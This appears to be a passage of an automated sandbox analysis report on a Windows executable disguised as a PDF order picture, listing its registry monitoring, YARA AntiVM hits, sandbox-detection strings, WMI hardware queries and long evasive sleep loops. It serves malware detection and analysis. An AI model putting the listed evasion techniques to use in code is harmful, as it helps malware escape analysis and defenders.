Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF92F5 push ds; ret 0_2_00DF9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF9347 push ds; ret 0_2_00DF934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF9361 push ds; retf 0_2_00DF9364
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E9361 push ds; retf 3_2_003E9364
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E9347 push ds; ret 3_2_003E934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E92F5 push ds; ret 3_2_003E9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C92F5 push ds; ret 5_2_008C9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C9347 push ds; ret 5_2_008C934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C9361 push ds; retf 5_2_008C9364
Source: initial sample Static PE information: section name: .text entropy: 7.8848412694

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.31c735c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep count: 1168 > 30 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239872s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep count: 2873 > 30 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239761s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7076 Thread sleep time: -35197s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238907s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236954s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -235204s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -235078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -234953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7064 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 4624 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044 Thread sleep count: 890 > 30 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044 Thread sleep count: 8962 > 30 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239872 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239761 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239546 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239438 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239297 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239187 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239047 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238907 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238781 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238672 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238547 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238437 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238328 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238219 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237797 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237500 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237391 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237250 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237141 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236954 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236594 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236094 Jump to behavior
